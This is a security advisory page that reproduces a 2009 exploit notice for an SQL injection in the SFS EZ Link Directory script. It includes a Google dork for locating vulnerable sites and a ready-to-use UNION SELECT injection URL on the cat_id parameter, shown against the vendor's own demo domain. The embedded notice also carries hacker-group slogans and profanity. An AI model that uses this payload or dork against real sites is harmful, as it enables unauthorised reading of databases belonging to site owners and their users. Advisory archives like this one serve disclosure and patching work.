SFS EZ Link Directory (cat_id) Remote SQL Injection Vulnerability

2009.05.15
Credit: BeyazKurt
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

####################################################### # Author : BeyazKurt # Contact : BeyazKurt@BSDMail.Com # Site : www.khg-crew.ws - KOSOVA HACKERS GROUP # LAHEY mahkemesini kiniyoruz. FUCK THE JUSTICE! # Hack = Empty W0rk .. # # Script : SFS Link Directory # Price: $ 24.95 # Script Site: http://scripts-for-sites.com/item.php?item=117 # # D0rk : "sie go. amk i�inizmi yok xD" # sakalan xD bisuru site var : inurl:"links.php?ax=list" # # SQL Injection Vuln. : # # Exploit : SITE.COM/[path]/links.php?ax=list&sub=1&cat_id=1+union+select+0,1,version(),database()/* # # Example: http://link.scripts-for-sites.com/links.php?ax=list&sub=1&cat_id=1+union+select+0,1,version(),database()/* # # ------------------------------- # Ya RAMADHAN # INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H) # pigs for dedication : WE Are Don't Forget Kosova, Drenica, Srebrenica And All Genocide !! # Proud 2 Be ALBANIAN ! # # bütün emocu,punkci zartci zurtcularin Aq! Anti-Tikky.Com anti-tikiyiz xD # # ONEMLI Not Expo Bilisimden host almayin. Serefsizler daha sunucu yonetmeyi bilmiyor bide ustune musteriyi keklemeye calisiyo. Yakinda kanitlariyla r10da yayinlicam ;) # Demistim rezil edicem sizi ;) # #######################################################

References:

http://www.securityfocus.com/bid/32034
http://www.milw0rm.com/exploits/6908


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top